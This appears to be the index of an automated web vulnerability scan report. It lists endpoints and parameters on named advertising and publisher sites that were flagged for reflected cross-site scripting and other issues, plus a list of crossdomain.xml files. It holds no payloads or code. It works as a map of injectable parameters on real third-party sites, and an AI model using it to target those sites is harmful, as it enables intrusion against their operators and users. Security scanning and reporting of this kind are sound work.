1.1. http://ad.doubleclick.net/adj/DY146/ron_lifestyle [sz parameter]
1.2. http://ad.doubleclick.net/adj/hdm.quicksimple/other/ [id cookie]
1.3. http://api.uproxx.com/ulink/feed [c_cats parameter]
1.4. http://hfm.checkm8.com/adam/detect [&LOC parameter]
1.5. http://hfm.checkm8.com/adam/detect [HEIGHT parameter]
1.6. http://hfm.checkm8.com/adam/detect [WIDTH parameter]
1.7. http://hfm.checkm8.com/adam/detect [dt cookie]
1.8. http://hfm.checkm8.com/adam/detect [name of an arbitrarily supplied request parameter]
1.9. http://hfm.checkm8.com/adam/detect [req parameter]
1.10. http://hfm.checkm8.com/adam/detected [DATE parameter]
1.11. http://hfm.checkm8.com/adam/detected [FL parameter]
1.12. http://hfm.checkm8.com/adam/detected [RES parameter]
1.13. http://hfm.checkm8.com/adam/detected [Referer HTTP header]
1.14. http://hfm.checkm8.com/adam/detected [WIDTH parameter]
1.15. http://hfm.checkm8.com/adam/detected [cm8dccp cookie]
1.16. http://metrics.elle.com/b/ss/hcfellegirlprod/1/H.15.1/s92564277239143 [REST URL parameter 1]
1.17. http://metrics.elle.com/b/ss/hcfellegirlprod/1/H.15.1/s92564277239143 [REST URL parameter 4]
1.21. http://syn.verticalacuity.com/varw/getPromo [Referer HTTP header]
1.22. http://www.answerology.com/ [name of an arbitrarily supplied request parameter]
1.23. http://www.answerology.com/cobrands/cosmogirl/CosmogirlLayout.js [REST URL parameter 1]
1.24. http://www.answerology.com/cobrands/cosmopolitan/CosmopolitanLayout.js [REST URL parameter 1]
1.25. http://www.answerology.com/cobrands/cosmopolitan/CosmopolitanLayout.js [REST URL parameter 3]
1.27. http://www.answerology.com/cobrands/marieclaire/MarieClaireLayout.js [REST URL parameter 2]
1.29. http://www.answerology.com/cobrands/redbookmag/RedbookmagLayout.js [REST URL parameter 2]
1.30. http://www.answerology.com/cobrands/redbookmag/RedbookmagLayout.js [REST URL parameter 3]
1.31. http://www.answerology.com/cobrands/seventeen/SeventeenLayout.js [REST URL parameter 1]
1.32. http://www.answerology.com/cssjs/CharacterCounter.js [REST URL parameter 1]
1.33. http://www.answerology.com/cssjs/CoachesLayout.js [REST URL parameter 2]
1.34. http://www.answerology.com/cssjs/countdownTimer.js [REST URL parameter 1]
1.35. http://www.answerology.com/cssjs/countdownTimer.js [REST URL parameter 2]
1.36. http://www.answerology.com/index.aspx [REST URL parameter 1]
1.37. http://www.answerology.com/uploaded-images/801818/40x37_thumb.jpg [REST URL parameter 2]
1.38. http://www.networkadvertising.org/managing/opt_out.asp [__utmz cookie]
1.40. http://y.timesunion.com/b/ss/hearstalbanytu/1/H.21/s97295546184759 [REST URL parameter 1]
2.1. http://ce.lijit.com/merge [REST URL parameter 1]
2.2. http://pixel.quantserve.com/optout_set [nocache parameter]
2.3. http://www.networkadvertising.org/managing/optout_results.asp [optThis parameter]
3.1. http://amch.questionmarket.com/adsc/d927907/35/43624044/decide.php [ES cookie]
3.2. http://login.dotomi.com/ucm/UCMController [redir_url parameter]
3.3. http://optout.crwdcntrl.net/optout [ct parameter]
3.4. http://optout.crwdcntrl.net/optout [d parameter]
3.5. http://optout.crwdcntrl.net/optout [name of an arbitrarily supplied request parameter]
4. Cross-site scripting (reflected)
4.1. http://a.collective-media.net/adj/bzo.454.61DCBAA1/_default [REST URL parameter 2]
4.2. http://a.collective-media.net/adj/bzo.454.61DCBAA1/_default [REST URL parameter 3]
4.4. http://a.collective-media.net/adj/bzo.454.61DCBAA1/_default [sz parameter]
4.5. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/be_home [REST URL parameter 2]
4.6. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/be_home [REST URL parameter 3]
4.8. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/be_home [sz parameter]
4.9. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/home [REST URL parameter 2]
4.10. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/home [REST URL parameter 3]
4.12. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/home [sz parameter]
4.13. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/qo [REST URL parameter 2]
4.14. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/qo [REST URL parameter 3]
4.16. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/qo [sz parameter]
4.17. http://a.collective-media.net/cmadj/bzo.454.61DCBAA1/_default [REST URL parameter 1]
4.18. http://a.collective-media.net/cmadj/bzo.454.61DCBAA1/_default [REST URL parameter 2]
4.19. http://a.collective-media.net/cmadj/bzo.454.61DCBAA1/_default [REST URL parameter 3]
4.20. http://a.collective-media.net/cmadj/bzo.454.61DCBAA1/_default [sz parameter]
4.24. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/be_home [sz parameter]
4.25. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/home [REST URL parameter 1]
4.26. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/home [REST URL parameter 2]
4.27. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/home [REST URL parameter 3]
4.28. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/home [sz parameter]
4.29. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/qo [REST URL parameter 1]
4.30. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/qo [REST URL parameter 2]
4.31. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/qo [REST URL parameter 3]
4.32. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/qo [sz parameter]
4.33. http://ad.agkn.com/iframe!t=1089! [clk1 parameter]
4.34. http://ad.agkn.com/iframe!t=1089! [clk1 parameter]
4.35. http://ad.agkn.com/iframe!t=1089! [name of an arbitrarily supplied request parameter]
4.36. http://ad.agkn.com/iframe!t=1089! [name of an arbitrarily supplied request parameter]
4.37. http://adnxs.revsci.net/imp [Z parameter]
4.38. http://adnxs.revsci.net/imp [s parameter]
4.39. http://ads.adbrite.com/adserver/vdi/762701 [REST URL parameter 3]
4.40. http://adsfac.us/ag.asp [cc parameter]
4.41. http://adsfac.us/ag.asp [clk parameter]
4.42. http://adsfac.us/ag.asp [clk parameter]
4.43. http://advertising.aol.com/finish/0/4/1/ [REST URL parameter 1]
4.44. http://advertising.aol.com/finish/0/4/1/ [REST URL parameter 1]
4.45. http://advertising.aol.com/finish/1/4/1/ [REST URL parameter 1]
4.46. http://advertising.aol.com/finish/1/4/1/ [REST URL parameter 1]
4.47. http://advertising.aol.com/finish/2/4/1/ [REST URL parameter 1]
4.48. http://advertising.aol.com/finish/2/4/1/ [REST URL parameter 1]
4.49. http://advertising.aol.com/finish/3/4/1/ [REST URL parameter 1]
4.50. http://advertising.aol.com/finish/3/4/1/ [REST URL parameter 1]
4.51. http://advertising.aol.com/finish/4/4/1/ [REST URL parameter 1]
4.52. http://advertising.aol.com/finish/4/4/1/ [REST URL parameter 1]
4.53. http://advertising.aol.com/finish/5/4/1/ [REST URL parameter 1]
4.54. http://advertising.aol.com/finish/5/4/1/ [REST URL parameter 1]
4.55. http://advertising.aol.com/finish/6/4/1/ [REST URL parameter 1]
4.56. http://advertising.aol.com/finish/6/4/1/ [REST URL parameter 1]
4.57. http://advertising.aol.com/finish/7/4/1/ [REST URL parameter 1]
4.58. http://advertising.aol.com/finish/7/4/1/ [REST URL parameter 1]
4.59. http://advertising.aol.com/finish/8/4/1/ [REST URL parameter 1]
4.60. http://advertising.aol.com/finish/8/4/1/ [REST URL parameter 1]
4.61. http://advertising.aol.com/nai/nai.php [REST URL parameter 1]
4.62. http://advertising.aol.com/nai/nai.php [REST URL parameter 1]
4.63. http://advertising.aol.com/nai/nai.php [REST URL parameter 2]
4.64. http://advertising.aol.com/nai/nai.php [REST URL parameter 2]
4.65. http://advertising.aol.com/nai/nai.php [action_id parameter]
4.66. http://advertising.aol.com/token/0/2/1812733584/ [REST URL parameter 1]
4.67. http://advertising.aol.com/token/0/2/1812733584/ [REST URL parameter 1]
4.68. http://advertising.aol.com/token/0/3/295357155/ [REST URL parameter 1]
4.69. http://advertising.aol.com/token/0/3/295357155/ [REST URL parameter 1]
4.70. http://advertising.aol.com/token/1/1/819977518/ [REST URL parameter 1]
4.71. http://advertising.aol.com/token/1/1/819977518/ [REST URL parameter 1]
4.72. http://advertising.aol.com/token/1/3/1696897902/ [REST URL parameter 1]
4.73. http://advertising.aol.com/token/1/3/1696897902/ [REST URL parameter 1]
4.74. http://advertising.aol.com/token/2/2/1032347115/ [REST URL parameter 1]
4.75. http://advertising.aol.com/token/2/2/1032347115/ [REST URL parameter 1]
4.76. http://advertising.aol.com/token/2/3/1397978719/ [REST URL parameter 1]
4.77. http://advertising.aol.com/token/2/3/1397978719/ [REST URL parameter 1]
4.78. http://advertising.aol.com/token/3/1/8239370/ [REST URL parameter 1]
4.79. http://advertising.aol.com/token/3/1/8239370/ [REST URL parameter 1]
4.80. http://advertising.aol.com/token/3/3/1557169105/ [REST URL parameter 1]
4.81. http://advertising.aol.com/token/3/3/1557169105/ [REST URL parameter 1]
4.82. http://advertising.aol.com/token/4/1/1128450710/ [REST URL parameter 1]
4.83. http://advertising.aol.com/token/4/1/1128450710/ [REST URL parameter 1]
4.84. http://advertising.aol.com/token/4/3/708534695/ [REST URL parameter 1]
4.85. http://advertising.aol.com/token/4/3/708534695/ [REST URL parameter 1]
4.86. http://advertising.aol.com/token/5/2/1348442932/ [REST URL parameter 1]
4.87. http://advertising.aol.com/token/5/2/1348442932/ [REST URL parameter 1]
4.88. http://advertising.aol.com/token/5/3/1649521156/ [REST URL parameter 1]
4.89. http://advertising.aol.com/token/5/3/1649521156/ [REST URL parameter 1]
4.90. http://advertising.aol.com/token/6/1/1581270199/ [REST URL parameter 1]
4.91. http://advertising.aol.com/token/6/1/1581270199/ [REST URL parameter 1]
4.92. http://advertising.aol.com/token/6/3/882857095/ [REST URL parameter 1]
4.93. http://advertising.aol.com/token/6/3/882857095/ [REST URL parameter 1]
4.94. http://advertising.aol.com/token/7/1/52531776/ [REST URL parameter 1]
4.95. http://advertising.aol.com/token/7/1/52531776/ [REST URL parameter 1]
4.96. http://advertising.aol.com/token/7/3/1777313403/ [REST URL parameter 1]
4.97. http://advertising.aol.com/token/7/3/1777313403/ [REST URL parameter 1]
4.98. http://advertising.aol.com/token/8/1/585997419/ [REST URL parameter 1]
4.99. http://advertising.aol.com/token/8/1/585997419/ [REST URL parameter 1]
4.100. http://advertising.aol.com/token/8/3/144927758/ [REST URL parameter 1]
4.101. http://advertising.aol.com/token/8/3/144927758/ [REST URL parameter 1]
4.102. http://amch.questionmarket.com/adscgen/d_layer.php [lang parameter]
4.103. http://amch.questionmarket.com/adscgen/d_layer.php [site parameter]
4.104. http://amch.questionmarket.com/adscgen/d_layer.php [site parameter]
4.105. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [lang parameter]
4.107. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [site parameter]
4.108. http://api.uproxx.com/ulink/feed [pid parameter]
4.109. http://api.zap2it.com/tvlistings/zcConnector.jsp [aid parameter]
4.110. http://api.zap2it.com/tvlistings/zcConnector.jsp [ap parameter]
4.112. http://api.zap2it.com/tvlistings/zcConnector.jsp [stnlt parameter]
4.113. http://api.zap2it.com/tvlistings/zcConnector.jsp [v parameter]
4.114. http://api.zap2it.com/tvlistings/zcConnector.jsp [zip parameter]
4.115. http://b.scorecardresearch.com/beacon.js [c1 parameter]
4.116. http://b.scorecardresearch.com/beacon.js [c10 parameter]
4.117. http://b.scorecardresearch.com/beacon.js [c15 parameter]
4.118. http://b.scorecardresearch.com/beacon.js [c2 parameter]
4.119. http://b.scorecardresearch.com/beacon.js [c3 parameter]
4.120. http://b.scorecardresearch.com/beacon.js [c4 parameter]
4.121. http://b.scorecardresearch.com/beacon.js [c5 parameter]
4.122. http://b.scorecardresearch.com/beacon.js [c6 parameter]
4.123. http://c.aol.com/read/_topic_stats [callback parameter]
4.124. http://choices.truste.com/ca [c parameter]
4.125. http://choices.truste.com/ca [cid parameter]
4.126. http://choices.truste.com/ca [plc parameter]
4.127. http://cm.npc-hearst.overture.com/js_1_0/ [css_url parameter]
4.128. http://ellegirl.elle.com/ [name of an arbitrarily supplied request parameter]
4.158. http://ellegirl.elle.com/wp-content/themes/thesis/custom/custom.css [REST URL parameter 1]
4.159. http://ellegirl.elle.com/wp-content/themes/thesis/custom/custom.css [REST URL parameter 2]
4.160. http://ellegirl.elle.com/wp-content/themes/thesis/custom/custom.css [REST URL parameter 3]
4.161. http://ellegirl.elle.com/wp-content/themes/thesis/custom/custom.css [REST URL parameter 4]
4.162. http://ellegirl.elle.com/wp-content/themes/thesis/custom/custom.css [REST URL parameter 5]
4.169. http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/custom.js [REST URL parameter 1]
4.170. http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/custom.js [REST URL parameter 2]
4.171. http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/custom.js [REST URL parameter 3]
4.172. http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/custom.js [REST URL parameter 4]
4.173. http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/custom.js [REST URL parameter 5]
4.174. http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/custom.js [REST URL parameter 6]
4.181. http://ellegirl.elle.com/wp-content/themes/thesis/custom/layout.css [REST URL parameter 1]
4.182. http://ellegirl.elle.com/wp-content/themes/thesis/custom/layout.css [REST URL parameter 2]
4.183. http://ellegirl.elle.com/wp-content/themes/thesis/custom/layout.css [REST URL parameter 3]
4.184. http://ellegirl.elle.com/wp-content/themes/thesis/custom/layout.css [REST URL parameter 4]
4.185. http://ellegirl.elle.com/wp-content/themes/thesis/custom/layout.css [REST URL parameter 5]
4.186. http://ellegirl.elle.com/wp-content/themes/thesis/style.css [REST URL parameter 1]
4.187. http://ellegirl.elle.com/wp-content/themes/thesis/style.css [REST URL parameter 2]
4.188. http://ellegirl.elle.com/wp-content/themes/thesis/style.css [REST URL parameter 3]
4.189. http://ellegirl.elle.com/wp-content/themes/thesis/style.css [REST URL parameter 4]
4.190. http://ellegirl.elle.com/wp-includes/js/jquery/jquery.js [REST URL parameter 1]
4.191. http://ellegirl.elle.com/wp-includes/js/jquery/jquery.js [REST URL parameter 2]
4.192. http://ellegirl.elle.com/wp-includes/js/jquery/jquery.js [REST URL parameter 3]
4.193. http://ellegirl.elle.com/wp-includes/js/jquery/jquery.js [REST URL parameter 4]
4.194. http://event.adxpose.com/event.flow [uid parameter]
4.195. http://events.seattlepi.com/partner_json/search [image_size parameter]
4.196. http://events.seattlepi.com/partner_json/search [jsonsp parameter]
4.197. http://events.seattlepi.com/partner_json/search [st parameter]
4.198. http://events.stamfordadvocate.com/partner_json/search [image_size parameter]
4.199. http://events.stamfordadvocate.com/partner_json/search [jsonsp parameter]
4.200. http://events.stamfordadvocate.com/partner_json/search [st parameter]
4.201. http://js.revsci.net/gateway/gw.js [csid parameter]
4.202. http://mpd.mxptint.net/1/S74.API/G1/T124/js [mid parameter]
4.203. http://nai.ad.us-ec.adtechus.com/nai/daa.php [REST URL parameter 1]
4.204. http://nai.ad.us-ec.adtechus.com/nai/daa.php [REST URL parameter 1]
4.205. http://nai.ad.us-ec.adtechus.com/nai/daa.php [REST URL parameter 2]
4.206. http://nai.ad.us-ec.adtechus.com/nai/daa.php [REST URL parameter 2]
4.207. http://nai.adserver.adtechus.com/nai/daa.php [REST URL parameter 1]
4.208. http://nai.adserver.adtechus.com/nai/daa.php [REST URL parameter 1]
4.209. http://nai.adserver.adtechus.com/nai/daa.php [REST URL parameter 2]
4.210. http://nai.adserver.adtechus.com/nai/daa.php [REST URL parameter 2]
4.211. http://nai.adserverec.adtechus.com/nai/daa.php [REST URL parameter 1]
4.212. http://nai.adserverec.adtechus.com/nai/daa.php [REST URL parameter 1]
4.213. http://nai.adserverec.adtechus.com/nai/daa.php [REST URL parameter 2]
4.214. http://nai.adserverec.adtechus.com/nai/daa.php [REST URL parameter 2]
4.215. http://nai.adserverwc.adtechus.com/nai/daa.php [REST URL parameter 1]
4.216. http://nai.adserverwc.adtechus.com/nai/daa.php [REST URL parameter 1]
4.217. http://nai.adserverwc.adtechus.com/nai/daa.php [REST URL parameter 2]
4.218. http://nai.adserverwc.adtechus.com/nai/daa.php [REST URL parameter 2]
4.219. http://nai.adsonar.com/nai/daa.php [REST URL parameter 1]
4.220. http://nai.adsonar.com/nai/daa.php [REST URL parameter 1]
4.221. http://nai.adsonar.com/nai/daa.php [REST URL parameter 2]
4.222. http://nai.adsonar.com/nai/daa.php [REST URL parameter 2]
4.223. http://nai.adtech.de/nai/daa.php [REST URL parameter 1]
4.224. http://nai.adtech.de/nai/daa.php [REST URL parameter 1]
4.225. http://nai.adtech.de/nai/daa.php [REST URL parameter 2]
4.226. http://nai.adtech.de/nai/daa.php [REST URL parameter 2]
4.227. http://nai.advertising.com/nai/daa.php [REST URL parameter 1]
4.228. http://nai.advertising.com/nai/daa.php [REST URL parameter 1]
4.229. http://nai.advertising.com/nai/daa.php [REST URL parameter 2]
4.230. http://nai.advertising.com/nai/daa.php [REST URL parameter 2]
4.231. http://nai.glb.adtechus.com/modules/book/book.css [REST URL parameter 1]
4.232. http://nai.glb.adtechus.com/modules/book/book.css [REST URL parameter 1]
4.233. http://nai.glb.adtechus.com/modules/book/book.css [REST URL parameter 2]
4.234. http://nai.glb.adtechus.com/modules/book/book.css [REST URL parameter 2]
4.235. http://nai.glb.adtechus.com/modules/book/book.css [REST URL parameter 3]
4.236. http://nai.glb.adtechus.com/modules/book/book.css [REST URL parameter 3]
4.237. http://nai.glb.adtechus.com/modules/node/node.css [REST URL parameter 1]
4.238. http://nai.glb.adtechus.com/modules/node/node.css [REST URL parameter 1]
4.239. http://nai.glb.adtechus.com/modules/node/node.css [REST URL parameter 2]
4.240. http://nai.glb.adtechus.com/modules/node/node.css [REST URL parameter 2]
4.241. http://nai.glb.adtechus.com/modules/system/defaults.css [REST URL parameter 1]
4.242. http://nai.glb.adtechus.com/modules/system/defaults.css [REST URL parameter 1]
4.243. http://nai.glb.adtechus.com/modules/system/defaults.css [REST URL parameter 2]
4.244. http://nai.glb.adtechus.com/modules/system/defaults.css [REST URL parameter 2]
4.245. http://nai.glb.adtechus.com/modules/system/system-menus.css [REST URL parameter 1]
4.246. http://nai.glb.adtechus.com/modules/system/system-menus.css [REST URL parameter 1]
4.247. http://nai.glb.adtechus.com/modules/system/system-menus.css [REST URL parameter 2]
4.248. http://nai.glb.adtechus.com/modules/system/system-menus.css [REST URL parameter 2]
4.249. http://nai.glb.adtechus.com/modules/system/system.css [REST URL parameter 1]
4.250. http://nai.glb.adtechus.com/modules/system/system.css [REST URL parameter 1]
4.251. http://nai.glb.adtechus.com/modules/system/system.css [REST URL parameter 2]
4.252. http://nai.glb.adtechus.com/modules/system/system.css [REST URL parameter 2]
4.253. http://nai.glb.adtechus.com/modules/user/user.css [REST URL parameter 1]
4.254. http://nai.glb.adtechus.com/modules/user/user.css [REST URL parameter 1]
4.255. http://nai.glb.adtechus.com/modules/user/user.css [REST URL parameter 2]
4.256. http://nai.glb.adtechus.com/modules/user/user.css [REST URL parameter 2]
4.257. http://nai.glb.adtechus.com/nai/daa.php [REST URL parameter 1]
4.258. http://nai.glb.adtechus.com/nai/daa.php [REST URL parameter 1]
4.259. http://nai.glb.adtechus.com/nai/daa.php [REST URL parameter 2]
4.260. http://nai.glb.adtechus.com/nai/daa.php [REST URL parameter 2]
4.267. http://nai.glb.adtechus.com/sites/all/modules/filefield/filefield.css [REST URL parameter 1]
4.268. http://nai.glb.adtechus.com/sites/all/modules/filefield/filefield.css [REST URL parameter 1]
4.269. http://nai.glb.adtechus.com/sites/all/modules/filefield/filefield.css [REST URL parameter 2]
4.270. http://nai.glb.adtechus.com/sites/all/modules/filefield/filefield.css [REST URL parameter 2]
4.271. http://nai.glb.adtechus.com/sites/all/modules/pollfield/pollfield.css [REST URL parameter 1]
4.272. http://nai.glb.adtechus.com/sites/all/modules/pollfield/pollfield.css [REST URL parameter 1]
4.273. http://nai.glb.adtechus.com/sites/all/modules/views/css/views.css [REST URL parameter 1]
4.274. http://nai.glb.adtechus.com/sites/all/modules/views/css/views.css [REST URL parameter 1]
4.277. http://nai.glb.adtechus.com/sites/all/themes/zen/aolad/css/screen.css [REST URL parameter 1]
4.278. http://nai.glb.adtechus.com/sites/all/themes/zen/aolad/css/screen.css [REST URL parameter 1]
4.279. http://nai.glb.adtechus.com/sites/all/themes/zen/aolad/css/screen.css [REST URL parameter 2]
4.280. http://nai.glb.adtechus.com/sites/all/themes/zen/aolad/css/screen.css [REST URL parameter 2]
4.281. http://nai.glb.adtechus.com/sites/all/themes/zen/aolad/css/screen.css [REST URL parameter 3]
4.282. http://nai.glb.adtechus.com/sites/all/themes/zen/aolad/css/screen.css [REST URL parameter 3]
4.283. http://nai.glb.adtechus.com/sites/all/themes/zen/zen/html-elements.css [REST URL parameter 1]
4.284. http://nai.glb.adtechus.com/sites/all/themes/zen/zen/html-elements.css [REST URL parameter 1]
4.285. http://nai.glb.adtechus.com/sites/all/themes/zen/zen/tabs.css [REST URL parameter 1]
4.286. http://nai.glb.adtechus.com/sites/all/themes/zen/zen/tabs.css [REST URL parameter 1]
4.287. http://nai.tacoda.at.atwola.com/nai/daa.php [REST URL parameter 1]
4.288. http://nai.tacoda.at.atwola.com/nai/daa.php [REST URL parameter 1]
4.289. http://nai.tacoda.at.atwola.com/nai/daa.php [REST URL parameter 2]
4.290. http://nai.tacoda.at.atwola.com/nai/daa.php [REST URL parameter 2]
4.291. http://pixel.adsafeprotected.com/jspix [anId parameter]
4.292. http://pixel.adsafeprotected.com/jspix [campId parameter]
4.293. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]
4.294. http://pixel.adsafeprotected.com/jspix [pubId parameter]
4.295. http://r.skimresources.com/api/ [callback parameter]
4.298. http://servedby.flashtalking.com/imp/3/17799 [cachebuster parameter]
4.299. http://servedby.flashtalking.com/imp/3/17799 [ftadz parameter]
4.300. http://servedby.flashtalking.com/imp/3/17799 [ftscw parameter]
4.301. http://servedby.flashtalking.com/imp/3/17799 [ftx parameter]
4.302. http://servedby.flashtalking.com/imp/3/17799 [fty parameter]
4.304. http://studio-5.financialcontent.com/hearst [Account parameter]
4.305. http://studio-5.financialcontent.com/hearst [Module parameter]
4.306. http://studio-5.financialcontent.com/hearst [REST URL parameter 1]
4.308. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]
4.309. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]
4.310. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]
4.311. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]
4.312. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]
4.313. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]
4.314. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]
4.315. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]
4.316. http://www.addthis.com/api/nai/optout [REST URL parameter 1]
4.317. http://www.addthis.com/api/nai/optout [REST URL parameter 1]
4.318. http://www.addthis.com/api/nai/optout [REST URL parameter 2]
4.319. http://www.addthis.com/api/nai/optout [REST URL parameter 2]
4.320. http://www.addthis.com/api/nai/optout [REST URL parameter 3]
4.321. http://www.addthis.com/api/nai/optout [REST URL parameter 3]
4.322. http://www.addthis.com/api/nai/status [REST URL parameter 1]
4.323. http://www.addthis.com/api/nai/status [REST URL parameter 1]
4.324. http://www.addthis.com/api/nai/status [REST URL parameter 2]
4.325. http://www.addthis.com/api/nai/status [REST URL parameter 2]
4.326. http://www.addthis.com/api/nai/status [REST URL parameter 3]
4.327. http://www.addthis.com/api/nai/status [REST URL parameter 3]
4.328. http://www.answerology.com/index.aspx [topic parameter]
4.329. http://www.answerology.com/index.aspx [topic parameter]
4.330. http://www.chron.com/apps/adWiz/adWiz.mpl [url parameter]
4.334. http://www.gather.com/URI+SYNTAX+EXCEPTION [REST URL parameter 1]
4.335. http://www.gather.com/URI+SYNTAX+EXCEPTION [REST URL parameter 1]
4.336. http://www.gather.com/a [REST URL parameter 1]
4.337. http://www.gather.com/a [REST URL parameter 1]
4.338. http://www.gather.com/favicon.ico [REST URL parameter 1]
4.339. http://www.gather.com/favicon.ico [REST URL parameter 1]
4.340. http://www.gather.com/global_andre.css [REST URL parameter 1]
4.341. http://www.gather.com/global_andre.css [REST URL parameter 1]
4.342. http://www.gather.com/peopleAreTalking.action [REST URL parameter 1]
4.343. http://www.gather.com/peopleAreTalking.action [REST URL parameter 1]
4.344. http://www.kampyle.com/feedback_form/ff-feedback-form.php [amp;form_id parameter]
4.345. http://www.kampyle.com/feedback_form/ff-feedback-form.php [amp;lang parameter]
4.347. http://www.kampyle.com/feedback_form/ff-feedback-form.php [stats parameter]
4.348. http://www.kampyle.com/feedback_form/ff-feedback-form.php [time_on_site parameter]
4.349. http://www.kampyle.com/feedback_form/ff-feedback-form.php [time_on_site parameter]
4.350. http://www.kampyle.com/feedback_form/ff-feedback-form.php [url parameter]
4.351. http://www.kampyle.com/feedback_form/ff-feedback-form.php [utma parameter]
4.352. http://www.kampyle.com/feedback_form/ff-feedback-form.php [utmv parameter]
4.353. http://www.kampyle.com/feedback_form/ff-feedback-form.php [utmz parameter]
4.354. http://www.local.com/dart/ [css parameter]
4.355. http://www.local.com/dart/ [kw parameter]
4.356. http://www.local.com/dart/ [kw parameter]
4.357. http://www.local.com/dart/ [l parameter]
4.358. http://www.local.com/dart/ [l parameter]
4.359. http://www.local.com/dart/ [ord parameter]
4.360. http://www.local.com/dart/ [ord parameter]
4.361. http://www.local.com/dart/ [p parameter]
4.362. http://www.local.com/dart/ [p parameter]
4.363. http://www.local.com/dart/ [sz parameter]
4.364. http://www.local.com/dart/ [sz parameter]
4.365. http://www.local.com/dart/ [zip parameter]
4.366. http://www.networkadvertising.org/managing/optout_results.asp [yahoo_token parameter]
4.367. http://www.stamfordadvocatedailydeals.com/widgets/widget [REST URL parameter 2]
4.368. http://adnxs.revsci.net/imp [Referer HTTP header]
4.369. http://pixel.adsafeprotected.com/jspix [Referer HTTP header]
4.370. http://advertising.aol.com/nai/nai.php [token_nai_ad_us-ec_adtechus_com cookie]
4.371. http://advertising.aol.com/nai/nai.php [token_nai_adserver_adtechus_com cookie]
4.372. http://advertising.aol.com/nai/nai.php [token_nai_adserverec_adtechus_com cookie]
4.373. http://advertising.aol.com/nai/nai.php [token_nai_adserverwc_adtechus_com cookie]
4.374. http://advertising.aol.com/nai/nai.php [token_nai_adsonar_com cookie]
4.375. http://advertising.aol.com/nai/nai.php [token_nai_adtech_de cookie]
4.376. http://advertising.aol.com/nai/nai.php [token_nai_advertising_com cookie]
4.377. http://advertising.aol.com/nai/nai.php [token_nai_glb_adtechus_com cookie]
4.378. http://advertising.aol.com/nai/nai.php [token_nai_tacoda_at_atwola_com cookie]
4.379. http://contextweb.pixel.invitemedia.com/context_sync [uid cookie]
4.380. http://r.skimresources.com/api/ [skimGUID cookie]
5.2. http://33across.com/crossdomain.xml
5.3. http://a.collective-media.net/crossdomain.xml
5.4. http://a.netmng.com/crossdomain.xml
5.5. http://a.rad.msn.com/crossdomain.xml
5.6. http://a.rfihub.com/crossdomain.xml
5.7. http://a.tribalfusion.com/crossdomain.xml
5.8. http://ad.agkn.com/crossdomain.xml
5.9. http://ad.amgdgt.com/crossdomain.xml
5.10. http://ad.auditude.com/crossdomain.xml
5.11. http://ad.doubleclick.net/crossdomain.xml
5.12. http://ad.turn.com/crossdomain.xml
5.13. http://admin.brightcove.com/crossdomain.xml
5.14. http://admonkey.dapper.net/crossdomain.xml
5.15. http://ads.amgdgt.com/crossdomain.xml
5.16. http://ads.undertone.com/crossdomain.xml
5.17. http://ads.yldmgrimg.net/crossdomain.xml
5.18. http://adserver.teracent.net/crossdomain.xml
5.19. http://adsfac.us/crossdomain.xml
5.20. http://adunit.cdn.auditude.com/crossdomain.xml
5.21. http://afe.specificclick.net/crossdomain.xml
5.22. http://ajax.googleapis.com/crossdomain.xml
5.23. http://amch.questionmarket.com/crossdomain.xml
5.24. http://analytics.newsinc.com/crossdomain.xml
5.25. http://api.zap2it.com/crossdomain.xml
5.26. http://as1.suitesmart.com/crossdomain.xml
5.27. http://assets.newsinc.com/crossdomain.xml
5.28. http://b.rad.msn.com/crossdomain.xml
5.29. http://b.scorecardresearch.com/crossdomain.xml
5.30. http://bh.contextweb.com/crossdomain.xml
5.31. http://bs.serving-sys.com/crossdomain.xml
5.32. http://c.brightcove.com/crossdomain.xml
5.33. http://c.delish.com/crossdomain.xml
5.34. http://c.msn.com/crossdomain.xml
5.35. http://cache.specificmedia.com/crossdomain.xml
5.36. http://cdn.eyewonder.com/crossdomain.xml
5.37. http://cdn.turn.com/crossdomain.xml
5.38. http://ce.lijit.com/crossdomain.xml
5.39. http://cn1.kaboodle.com/crossdomain.xml
5.40. http://cn2.kaboodle.com/crossdomain.xml
5.41. http://cn3.kaboodle.com/crossdomain.xml
5.42. http://content.aggregateknowledge.com/crossdomain.xml
5.43. http://d.agkn.com/crossdomain.xml
5.44. http://dc.kaboodle.com/crossdomain.xml
5.45. http://dis.criteo.com/crossdomain.xml
5.46. http://ds.serving-sys.com/crossdomain.xml
5.47. http://edge.aperture.displaymarketplace.com/crossdomain.xml
5.48. http://edge1.catalog.video.msn.com/crossdomain.xml
5.49. http://edge3.catalog.video.msn.com/crossdomain.xml
5.50. http://event.adxpose.com/crossdomain.xml
